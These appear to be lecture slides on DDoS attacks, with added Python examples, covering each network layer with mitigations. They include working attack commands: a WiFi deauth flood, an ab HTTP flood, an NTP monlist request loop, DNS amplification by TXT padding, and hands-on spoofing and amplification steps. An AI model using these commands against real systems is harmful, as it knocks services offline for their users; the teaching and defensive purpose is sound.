DDoS
Artūrs Lavrenovs
What is DDoS?
- DoS, denial-of-service attack: an attempt to make a machine or network resource unavailable to its intended users.
- DDoS: DoS attacks sent from two or more sources.
DDoS in a nutshell
- How does DDoS work? It consumes any kind of resource required to process legitimate actions.
- How to deal with DDoS?
  - Allocate more resources than the size of the DDoS attack
  - Try to filter out the bad traffic
Who are the victims?
- Anything related to $: banks, CC processors, online payment systems, insurance/investment/financial/trading companies
- Political sites
- Government sites
- News sites
- Piracy sites and anti-piracy outfits
- Game servers
- Almost any kind of business
Which OSI levels are susceptible to DDoS? ALL
OSI 1st level - Physical
- Shared physical link, for example: WiFi, radio, mobile, GPS, satellite
- Generate radio noise
  - Can be used as countersurveillance
  - Price starting from a few dozen $
  - Big devices (>1000$) can cover >1 km
- How to deal with this DDoS?
  - Use a radar gun to locate the signal source
  - Call the responsible agency (they will send a van with antennas on the roof) because it is a serious issue
Responsible agency in Latvia: VAS Elektroniskie sakari, Radiofrekvenču uzraudzības nodaļas Radiokontroles daļa
http://vases.lv/lv/par_mums/kontaktinformacija/
OSI 2nd level - Data Link
- WiFi (802.11) deauthentication
  - Can disconnect all WiFi users
  - Flood deauthentication packets so nobody can connect (or flood all except yourself)
  - aireplay-ng --deauth 1000 -a 00:11:22:33:44:55 wlan0
  - A powerful enough external WiFi card can interfere with clients inside a building from outside
- How to deal? You have to find the source and remove it (same as 1st level)
OSI 2nd level - Old school: MAC flooding
- Wired networking with switches
- Switches maintain a MAC table in RAM (limited size); it maps MAC address <-> physical port
- The attacker floods Ethernet frames with random MAC addresses
- When the MAC table overflows, the switch becomes a hub and floods traffic out of all ports
- Not only DoS but also used for packet sniffing
- Solution: get a better switch
  - Limiting MAC addresses per physical port
  - Managed switches
OSI 3rd level - Volumetric DDoS
- Volumetric DDoS resides at this level
- Use more bandwidth than is available to the victim: bits per second (bps)
- Send more packets than can be handled: packets per second (pps)
- The victim has limited bandwidth available (e.g., a 100 Mbps or 1 Gbps link); when the link is saturated, packets get dropped
  - Including legitimate users' packets; the service slows down until it has become unusable
- How to deal with volumetric DDoS? You can't. At least not on your own.
OSI 3rd level - Network: spoofing IP
- The source of the volumetric (and other) DDoS problems occurs at the 3rd level: IP spoofing
- No ISP should allow packets with a spoofed source IP to leave its network
- Lots of bad ISPs, mostly in 3rd world countries and in places with a lot of Internet
- Spoofed IPs can't be efficiently filtered away from the source; filtering is effective only on your own edge (BCP38)
- Volumetric DDoS without IP spoofing is far less efficient and could be filtered
OSI 3rd level - Spoofing IP
Volumetric DDoS - Reflection/Amplification
- DNS, NTP, SNMP, ICMP reflection
  - Create packets with the victim's IP as the spoofed source and send them to reflectors
  - The reflectors create responses and send them to the victim
- Amplification
  - The response size is usually bigger than the request size, so amplification happens
  - Increase amplification by crafting requests which generate bigger responses
  - Potential for amplification: 10x-100x
  - With a 1 Gbps spoofable uplink you can create up to a 100 Gbps attack, enough to kill a small/medium DC/ISP
Volumetric DDoS - Old school: Smurf attack
- ICMP reflection+amplification; packets are sent to the network's broadcast IP
- Not a viable attack anymore: ISPs are blocking packets sent to the broadcast IP
Volumetric DDoS - DNS amplification
- DNS queries are short and usually the answers are short as well, e.g., 1 IP address for an A query
- Fill a domain with some trash entries and query something specific or ANY (not all open resolvers might handle it)
- Fill a domain with many A entries (almost all open resolvers should handle it)
- A DNS resolver should use TCP if the answer is >512 B long
- DNSSEC adds cryptographic signatures and keys to publicly visible records
- Luckily the (misconfigured) server count is still low
- The DNS server itself can be attacked (CPU-intensive queries)
$ dig wradish.com ANY
;; Truncated, retrying in TCP mode.

; <<>> DiG 9.8.1-P1 <<>> wradish.com ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45484
;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;wradish.com.            IN    ANY

;; ANSWER SECTION:
wradish.com.    5    IN    TXT    "asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf " "asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf"
wradish.com.    5    IN    TXT    "tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy ttttttttttttt" "yyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttt" "tttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy"
wradish.com.    5    IN    TXT    "hkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdf hkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfh" "alsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfh alsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhf" "asdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhf asdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfh" "asdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfh asdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdf"
wradish.com.    5    IN    TXT    "asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 as" "dfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234"
wradish.com.    5    IN    TXT    "test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test tests" "ttest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest" " test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtes" "t test teststtest test test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest tes" "t te"
wradish.com.    5    IN    MX    10 mailstore1.secureserver.net.
wradish.com.    5    IN    MX    0 smtp.secureserver.net.
wradish.com.    5    IN    SOA    ns19.domaincontrol.com. dns.jomax.net. 2014042218 28800 7200 604800 600
wradish.com.    5    IN    NS    ns20.domaincontrol.com.
wradish.com.    5    IN    NS    ns19.domaincontrol.com.

;; Query time: 5 msec
;; SERVER: 91.198.156.20#53(91.198.156.20)
;; WHEN: Tue May 13 02:48:07 2014
;; MSG SIZE rcvd: 3782
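The dig run above ends with MSG SIZE rcvd: 3782. The Python below is an added example, not code from the slides: it computes the size of the request from the DNS wire format (12-byte header, length-prefixed labels, QTYPE and QCLASS) and divides the reply size into it to get the amplification factor a reflector running this zone gives. The function names, the DIG_TRAILER sample (the last four lines of the output above) and the assumption that the query carried no EDNS OPT record (consistent with ADDITIONAL: 0 and the fallback to TCP) are this example's own.

```python
import re

DNS_HEADER_LEN = 12        # ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT (2 bytes each)
UDP_DNS_MAX = 512          # classic UDP payload limit when no EDNS buffer size is offered
IP_UDP_OVERHEAD = 20 + 8   # IPv4 + UDP headers, paid by request and reply alike


def qname_wire_len(name: str) -> int:
    """Wire length of a domain name: one length byte per label plus the label
    bytes, terminated by a zero byte ("wradish.com" -> 1+7 + 1+3 + 1 = 13)."""
    labels = [label for label in name.strip(".").split(".") if label]
    return sum(1 + len(label) for label in labels) + 1


def query_wire_len(name: str) -> int:
    """Size of a minimal one-question query: header + QNAME + QTYPE + QCLASS."""
    return DNS_HEADER_LEN + qname_wire_len(name) + 2 + 2


def reply_size_from_dig(dig_output: str) -> int:
    """Pull the 'MSG SIZE rcvd: N' figure out of dig's trailer lines."""
    m = re.search(r"MSG SIZE\s+rcvd:\s+(\d+)", dig_output)
    if not m:
        raise ValueError("no MSG SIZE line in dig output")
    return int(m.group(1))


def amplification(name: str, dig_output: str, on_wire: bool = False) -> float:
    """Bytes the reflector emits towards the spoofed source per byte of request.
    on_wire=True counts IP+UDP headers on both sides, which lowers the ratio."""
    req = query_wire_len(name)
    resp = reply_size_from_dig(dig_output)
    if on_wire:
        req += IP_UDP_OVERHEAD
        resp += IP_UDP_OVERHEAD
    return resp / req


def udp_reply_is_truncated(dig_output: str) -> bool:
    """True when the reply does not fit a plain 512-byte UDP answer; a resolver
    that honours no larger EDNS buffer then only returns the truncated reply."""
    return reply_size_from_dig(dig_output) > UDP_DNS_MAX


def udp_amplification_cap(name: str) -> float:
    """Upper bound on the ratio when the reflector answers over plain UDP only."""
    return UDP_DNS_MAX / query_wire_len(name)


# Constructed sample: the trailer lines of the dig run shown above.
DIG_TRAILER = """;; Query time: 5 msec
;; SERVER: 91.198.156.20#53(91.198.156.20)
;; WHEN: Tue May 13 02:48:07 2014
;; MSG SIZE rcvd: 3782
"""

if __name__ == "__main__":
    print("query bytes:", query_wire_len("wradish.com"))
    print("amplification: %.1fx" % amplification("wradish.com", DIG_TRAILER))
    print("on-wire amplification: %.1fx" % amplification("wradish.com", DIG_TRAILER, on_wire=True))
    print("reply needs TCP or EDNS:", udp_reply_is_truncated(DIG_TRAILER))
    print("plain-UDP cap: %.1fx" % udp_amplification_cap("wradish.com"))
```

For this zone the 29-byte query yields a 3782-byte reply, about 130x, which is why padding a domain with TXT records is the step that lifts a DNS reflector above the "short question, short answer" case. The practitioner's caveat is in udp_reply_is_truncated: without an EDNS buffer the reflector can only return 512 bytes (about 17x here), so the full ratio depends on the open resolver accepting a large EDNS payload size.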
Why do volumetric DDoS attacks work?
- Millions of misconfigured/vulnerable network devices
- DNS: http://openresolverproject.org/ lists 28 million significant threats (May 2014)
  - CloudFlare received a 300 Gbps DDoS (March 2013)
- NTP: the Christmas present of 2013
  - CloudFlare received 400 Gbps (February 2014); only 4529 vulnerable NTP servers were used
Volumetric DDoS - mitigation
- What is the most common way to mitigate volumetric DDoS? Null-routing the IP (the attackers have achieved their goal)
  - ISP/DC have to protect their network and customers
- How to deal with volumetric DDoS?
  - Have/buy more IP transit and have enough processing power for packets
  - Buy filtered IP transit
- How to deal with all volumetric DDoS in the long run?
  - Remove the option to send spoofed IPs (filtering on IP transit provider links) (hard)
  - Remove all vulnerable servers (almost impossible)
OSI 4th level - Transport
- The TCP stack implementation requires tables and buffers in RAM allocated by the OS
- SYN flood: flood the server with TCP SYN packets
  - Sent from different spoofed IPs and different ports
  - The server creates an entry in the TCP state table for each SYN packet
  - Maximum entries: (IP) 2^32 * (ports) 2^16, which takes more memory than available
- How to deal? Best practice is SYN cookies
  - Proposed future standard TCPCT (solves some SYN cookie issues and instead creates others)
OSI 4th level - TCP SYN cookies
- Do not store the SYN in the state table
- SYN cookie = ($t%32)(mss)hash(sip,sp,dip,dp,$t)
  - $t is a timestamp with a precision of 64 seconds
  - MSS - maximum segment size
- Send the client a SYN/ACK with initial TCP sequence number == SYN cookie
- The client responds with SYN cookie+1
- The server calculates it again and, if it matches, establishes the TCP session (responds with ACK and adds it to the TCP state table)
- Check (set) in Linux: # sysctl net.ipv4.tcp_syncookies
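To make the cookie formula concrete, here is an added Python model of the slide's scheme; it is not from the slides and not the code of any real TCP stack. The bit layout (5 bits of $t, 3 bits of MSS index, 24 bits of hash), the MSS_TABLE, HMAC-SHA256 as the hash, the ACCEPT_WINDOW of two 64-second ticks and all function names are assumptions made for this example.

```python
import hashlib
import hmac
import socket
import struct

MSS_TABLE = [536, 1220, 1440, 1460]   # MSS values the 3-bit field can encode (assumed table)
T_GRANULARITY = 64                    # seconds per value of $t, as on the slide
ACCEPT_WINDOW = 2                     # accept the current $t and the previous one


def counter(now):
    """$t: coarse timestamp with 64-second precision."""
    return int(now) // T_GRANULARITY


def mss_index(mss):
    """Index of the largest table entry not above the client's MSS (0 if none fits)."""
    idx = 0
    for i, value in enumerate(MSS_TABLE):
        if value <= mss:
            idx = i
    return idx


def hash24(secret, sip, sp, dip, dp, t):
    """Keyed hash(sip, sp, dip, dp, $t), truncated to the cookie's low 24 bits."""
    msg = (socket.inet_aton(sip) + struct.pack("!H", sp)
           + socket.inet_aton(dip) + struct.pack("!HQ", dp, t))
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(secret, sip, sp, dip, dp, mss, now):
    """Initial sequence number for the SYN/ACK; nothing is stored in the state table."""
    t = counter(now)
    return ((t % 32) << 27) | (mss_index(mss) << 24) | hash24(secret, sip, sp, dip, dp, t)


def check_cookie(secret, sip, sp, dip, dp, ack, now):
    """The client's ACK carries cookie+1. Recompute for the recent $t values and
    return the negotiated MSS on a match, or None if the SYN/ACK was never ours
    (wrong peer, wrong secret, or a cookie older than the accept window)."""
    cookie = (ack - 1) & 0xFFFFFFFF
    t_bits = cookie >> 27
    idx = (cookie >> 24) & 0x7
    t_now = counter(now)
    for back in range(ACCEPT_WINDOW):
        t = t_now - back
        if t % 32 == t_bits and (cookie & 0xFFFFFF) == hash24(secret, sip, sp, dip, dp, t):
            return MSS_TABLE[idx]
    return None


if __name__ == "__main__":
    key = b"per-boot random secret (constructed)"
    c = make_cookie(key, "10.1.2.50", 40000, "10.1.2.12", 80, 1460, 1_000_000)
    print("SYN/ACK seq = 0x%08x" % c)
    print("valid ACK  ->", check_cookie(key, "10.1.2.50", 40000, "10.1.2.12", 80, c + 1, 1_000_030))
    print("stale ACK  ->", check_cookie(key, "10.1.2.50", 40000, "10.1.2.12", 80, c + 1, 1_000_300))
```

The point of the layout is that the server keeps no per-SYN state: everything needed to validate the third packet is recomputed from the packet headers, the secret and the coarse clock. The cost is visible in the code too: only the MSS values in the table survive the round trip, and an ACK arriving more than two ticks later is rejected, which is the class of SYN cookie issues the slide says TCPCT set out to solve.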
OSI 4th level - Non-amplified volumetric TCP DDoS
- Smaller than amplified UDP attacks (10xn Gbps instead of 100xn Gbps)
- The victim still has to reply with a SYN/ACK packet to every SYN received with a spoofed IP (cookies don't help here)
- The victim has to process all packets as real ones; it requires bandwidth equal to the attacker's (also high pps)
- Solution: intelligent analysis, which requires a lot of processing power
  - Does the IP match some previous data (historical HTTP logs)?
  - Block dubious networks (DC, not announced, GEO)
OSI 4th level - Reflected TCP DDoS
- Attackers send SYN packets with the victim's IP as the spoofed source to real-world servers with TCP services
- The real-world servers send SYN/ACK to the victim
- Fairly easy to deal with
  - The victim (if a server) has no reason to receive SYN/ACK
  - Drop all SYN/ACK as far from the victim as possible (ISP edge)
OSI 5th level - Session
- RPC, NFS, PPTP, NetBIOS, etc.
- Weaknesses in implementations
- Spoofed IP
- Session terminations
- End device overloading
- Least interesting DDoS
OSI 6th level - Presentation
- Most common target: SSL (especially for the $ category)
  - Send lots of/malformed SSL requests
  - SSL consumes a lot of CPU cycles
  - Response time degrades until the service has become unusable
  - Solution: SSL offloading + IDS/IPS/proprietary filtering systems
- Potential for DDoS: compression
  - Takes CPU cycles + memory
  - Find on-demand compression and put/get as much as you can
  - Solution: limiting and analyzing at the 7th OSI level
OSI 7th level
- HTTP, FTP, POP, SMTP
- In the case of TCP protocols IP spoofing does not work; you need a botnet
- Simple HTTP DoS: ab -n 100000 -c 1000 http://victim/
  - Solution: limit requests in the HTTP server or OS firewall
- HTTP DDoS solution
  - Identify the limits real users actually need
  - Set them in the HTTP server/OS firewall
  - A big botnet with each IP sending fewer requests than the limit (GEO filters, prolonged logs)
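Picking the limit and checking who exceeds it starts from the access log. The Python below is an added example, not from the slides: it runs a per-client sliding-window count over web server log lines and reports the IPs that exceed the limit, which is the same data a practitioner uses first to see what real users need and then to set the limit in the HTTP server or OS firewall. The combined log format, the constructed sample lines, the threshold of 30 requests per 10 seconds and the function names are this example's assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format (nginx/Apache default): client, ident, user, [time], "request", status, bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" (\d{3}) (\d+|-)')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (client_ip, epoch_seconds, status) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, stamp, status, _size = m.groups()
    return ip, datetime.strptime(stamp, TIME_FMT).timestamp(), int(status)


def find_flooders(lines, limit=30, window=10.0):
    """Sliding window per client IP: report an IP the first time it has sent more
    than `limit` requests inside any `window` seconds. Returns {ip: epoch of the hit}."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, t, _status = parsed
        q = recent[ip]
        q.append(t)
        while q and t - q[0] > window:      # forget requests older than the window
            q.popleft()
        if len(q) > limit and ip not in flagged:
            flagged[ip] = t
    return flagged


def sample_log():
    """Constructed log: one normal visitor (5 requests in 10 s) and one client
    doing 31 requests within 3 seconds. Lines are in per-client order."""
    stamp = "13/May/2014:02:48:%02d +0300"
    lines = ['10.1.2.50 - - [%s] "GET /page%d.html HTTP/1.1" 200 512' % (stamp % (2 * i), i)
             for i in range(5)]
    lines += ['10.1.2.77 - - [%s] "GET / HTTP/1.1" 200 512' % (stamp % (i // 11))
              for i in range(31)]
    return lines


if __name__ == "__main__":
    for ip, when in find_flooders(sample_log()).items():
        print("over limit:", ip, "at", datetime.fromtimestamp(when))
```

Run over a quiet day's log the function should flag nobody; the limit is then low enough to be enforced (nginx's limit_req or a per-source rule in the OS firewall) without touching real users. As the slide notes, a large botnet that keeps every source under the limit passes this check, which is where GEO filters and longer log retention come in.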
OSI 7th level - Slowloris HTTP DDoS
- The evil client creates as many concurrent HTTP connections as possible (fewer than the FW limits)
- Keeps the connections open as long as possible
- Periodically sends partial requests
- Multiple evil clients can exhaust the HTTP server's active connection pool
- Solution
  - Use an HTTP server with huge connection pools (e.g., nginx)
  - Use some security add-on
OSI 7th+ level
- Web applications residing in a web server
- Find slow-processing parts of the web application
  - Usually data creation, deletion, modification
  - Text search, DB LIMIT 435345,344
- Send fewer requests than the limit set at the 7th level
- Find scripts that don't check parameter bounds, example:
  - Protection against bots: captcha.php?length=5
  - captcha.php?length=5555555 consumes RAM and blocks till timeout (e.g., 60 seconds)
  - 1 req/sec blocks 60 PHP processes; 10 req/s is a DDoS
IP spoofing before edge filtering
- Some ISPs and DCs have implemented IP filtering only on the edge (clients can spoof IPs inside the network)
- If the network is big enough there are lots of different servers (DNS, NTP, HTTP)
- You can spoof the victim's IP and create a reflected DDoS (including TCP)
- The whole attack will originate from the network you are using
  - Easier to filter for the victim, easier to notice for the reflector network, easier to find the attacker
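The 3rd-level spoofing slide and this one make a single point between them: a BCP38 source-address check only stops a spoofed packet if it runs somewhere on that packet's path, and a check that exists only on the Internet-facing edge never sees traffic aimed at reflectors inside the same network. The Python below is an added example, not from the slides; it models one network with the same check in the two placements. The topology, the addresses (documentation ranges) and the policy names are constructed.

```python
import ipaddress


class Network:
    """An ISP/DC network: the prefixes it announces and the prefix list assigned
    to each customer port. Both policies apply the same source-address test;
    they differ only in where it runs."""

    def __init__(self, announced, customer_ports):
        self.announced = [ipaddress.ip_network(p) for p in announced]
        self.ports = {name: [ipaddress.ip_network(p) for p in prefixes]
                      for name, prefixes in customer_ports.items()}

    def _is_ours(self, addr):
        return any(addr in net for net in self.announced)

    def forward(self, pkt, policy):
        """pkt: {'port': ingress customer port, 'src': source IP, 'dst': destination IP}.
        policy: 'edge-only' (BCP38 check only on the transit links) or
        'per-port' (BCP38 check on every customer port, and at the edge as well)."""
        src = ipaddress.ip_address(pkt["src"])
        dst = ipaddress.ip_address(pkt["dst"])
        if policy == "per-port":
            if not any(src in net for net in self.ports[pkt["port"]]):
                return "dropped at customer port"
        if not self._is_ours(dst):            # packet leaves via the edge
            if not self._is_ours(src):
                return "dropped at edge"
            return "delivered to Internet"
        return "delivered inside network"     # never crosses the edge filter


# Constructed topology: the network announces 10.1.0.0/16; customer port cust-a
# owns 10.1.2.0/24 and the network's own DNS/NTP servers sit in 10.1.9.0/24.
NET = Network(["10.1.0.0/16"], {"cust-a": ["10.1.2.0/24"], "servers": ["10.1.9.0/24"]})

# 203.0.113.7 stands for an outside victim, 198.51.100.20 for an outside reflector.
PACKETS = [
    {"port": "cust-a", "src": "10.1.2.5",    "dst": "198.51.100.20"},  # legitimate
    {"port": "cust-a", "src": "203.0.113.7", "dst": "198.51.100.20"},  # spoofed, outside reflector
    {"port": "cust-a", "src": "203.0.113.7", "dst": "10.1.9.53"},      # spoofed, inside reflector
    {"port": "cust-a", "src": "10.1.9.53",   "dst": "198.51.100.20"},  # spoofed as an internal host
]


def outcomes(policy):
    """Fate of each packet in PACKETS under the given filter placement."""
    return [NET.forward(p, policy) for p in PACKETS]


if __name__ == "__main__":
    for policy in ("edge-only", "per-port"):
        print(policy)
        for pkt, fate in zip(PACKETS, outcomes(policy)):
            print("  %s -> %s: %s" % (pkt["src"], pkt["dst"], fate))
```

Under edge-only filtering the third and fourth packets get through: one reaches an internal reflector without ever crossing the edge, the other carries a source the edge considers legitimate because it is inside the announced range. The per-port check, applied where the packet enters, drops both while still passing the legitimate packet, which is the "remove the option to send spoofed IP" item from the mitigation slide done at the right place.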
Web savior: CloudFlare
- CDN provider, data centers across the globe
- Security includes DDoS protection which can handle the biggest attacks
  - Enough bandwidth to handle volumetric attacks
  - Filters all DDoS, including OSI 7th level
- Cheap: 200$/month; previous comparable outsourced services would cost >1000$/mo
- Much cheaper than handling security yourself (man hours, hardware/software, outsourcing) if DDoS is eventually expected
Why isn't everyone using CloudFlare?
- USA company (all your data are available to NSA/FBI/CIA and any other organizations)
- All your data are handled by a 3rd party
- Have to give up your SSL certificate (big no-no for $ related sites)
- Privacy concerns
- ToS, legal issues
- Does not protect network services (only Web)
- IP sharing (issues in countries/networks which block access to some content)
How to DDoS a CloudFlare site?
- Don't waste effort attacking CloudFlare
- Find a huge bug at the 7th+ OSI level which allows DDoS using very few requests (rare)
- Volumetric DDoS against the backend IP; how to find it:
  - Use security audit tools to locate the backend IP: crawl the site and search for the pattern 1.2.3.4, for example in error messages (that is why you have to turn off all error reporting)
  - Google for the domain's IP history; possibly the backend is the same
How do other filtering services work?
- Buy a lot of bandwidth from big DCs
  - Volumetric DDoS uses download BW
  - DCs have symmetrical links
  - DCs usually are traffic generators (most servers use upload BW)
  - Download BW can be bought at a fraction of the upload BW price
- Drop UDP, ICMP packets
- Intelligent TCP filtering
- Browser stack verification (is JavaScript implemented: challenge/response)
- Statistical filtering (against HTTP flood)
DDoS redirection
- Common scenario: a botnet (or bought servers) in misconfigured networks queries the DNS A record and spoofs the IP accordingly (creating an amplified reflected volumetric DDoS)
- The victim changes the A record to the suspected attacker, somebody he does not like or some government/military/law enforcement agency
- The DDoS automatically converges on the new victim
- Extremely gray area (possibly illegal) and the victim should never do that
- Redirect the attack to some of the attacking reflector nodes (e.g., misconfigured DNS servers)
(H-)Activism DDoS
- New form of protest
- Against governments, big corporations, anyone else whom people feel has been attacking their freedoms and interests
- LOIC (Low Orbit Ion Cannon): free software users choose to install to create a TCP/UDP flood
  - When many users launch LOIC at the same target it creates a DDoS
  - No reflection/amplification, so it can be filtered and the users can be identified
- Richard Stallman has stated that DoS is a form of 'Internet Street Protests'
- Governments treat them as criminals
DDoS economics
- If an attack is not used as a form of protest then it is usually carried out by some DDoS service
- Cheap and small attacks starting at 20$/day can break a website with no/low protection
- Average attacks starting at 50$/day can break a site without protection against volumetric attacks (most average and even big sites)
- Ordering DDoS is usually cheaper than ordering filtering for the victim (already a victory for evil)
- Huge additional competitive advantage (e.g., the competitor's e-shop is down)
- Almost impossible to identify who is responsible
How do people order DDoS?
- Use a search engine
- Select one of many verified offers
- Get a free test (10 min)
- Order by hourly/daily rate (refunds available)
- Pay using shady online payment systems with high anonymity
- Never get caught
Professional DDoS
- Complex attack (the efficient way is to wait till the victim has dealt with one issue before moving to the next one)
  - Check if the authoritative NS is weak (self-hosted), then flood it
  - Volumetric UDP DDoS
  - Spoofed TCP flood
  - HTTP attack with a botnet (usually with a web stack implemented)
  - Web application attack
  - Dedicated hacker altering the attack and analyzing 7th+ level weaknesses
- Pricing >=1000$/day
- If you can counter such an attack you are a rare professional
Unintentional DDoS
- By default most sites are not built and equipped to handle lots of (n x the current number of users) legitimate users
- There are huge sites with millions of users where people post links: reddit, slashdot, facebook
  - A link to an unprepared site gets posted and legitimate users kill it
- Web service specifics (usually found unintentionally and then exploited)
  - FaceBook notes: generate a list of images and add random parameters; FB servers crawl and cache them
  - Google Spreadsheets: same approach, use the formula =image()
How should banks handle DDoS?
- Buy filtered IP transit from a reliable and big ISP (SLA)
  - All UDP should be dropped
  - TCP above the SLA requirements should be dropped
- Buy a (proprietary) DDoS filtering device (a lot of $) with SLA and host it on-site
  - The bank signs an SSL certificate with its own certificate
  - Clients establish an SSL connection with the filter (using the intermediate certificate) and it decides if the client is good
  - SSL session renegotiation with the bank's servers
  - The certificate never leaves the bank's own servers, and sensitive user data are never handled by the filter either
  - The filter drops everything else and should handle 10x Gbps of TCP
Summary
- Is UDP bad? Nope. It is actually quite a good and useful protocol. Lazy network administrators have not configured their networks against IP spoofing.
- Is DNS/NTP/(put your protocol here) bad? Still nope. Those are quite useful protocols. Lazy network administrators are to blame:
  - Have not updated their server software
  - Have misconfigured servers
  - Commit no security audits
  - Network device (cheap kind) manufacturers.
- Are you a good network administrator?
Hands-on: volumetric DDoS
- Discovery, IP spoofing, reflection, amplification
- Loosely corresponds to the actions of actual attackers
Hands-on: real local network
1. Locate victim
2. Locate potential attack sources
3. Check attack sources
4. Spoof IP address
5. Create DDoS
6. Increase amplification
Our setup: Local network = Internet, subnet 10.1.2.0/24
Hands-on: locate victims and attack sources
- Use some software to map your local network to find victims, for example: nmap
- Choose one of the found web servers as the victim
- There are 2 types of attack available, with multiple sources for both; choose one or both
- Query and check if the attack sources work
Hands-on: DNS
- Query the DNS server:
  # host google.lv
  # dig google.lv
- Find queries which generate large responses
Hands-on: NTP
- ntpdate -q $ntp_server
- ntpdc -nc monlist $ntp_server
- Check maximum BW (ifstat -b)
  #!/bin/bash
  while true; do ntpdc -n -c monlist $ntp_server > /dev/null & done
- Why so little BW available?
Hands-on: NTP Python
import socket

# NTP mode 7 "monlist" request (the same query ntpdc -nc monlist sends); payload as on the slide.
# Python 3 sockets take bytes, hence the b"" literal; socket constants are upper case.
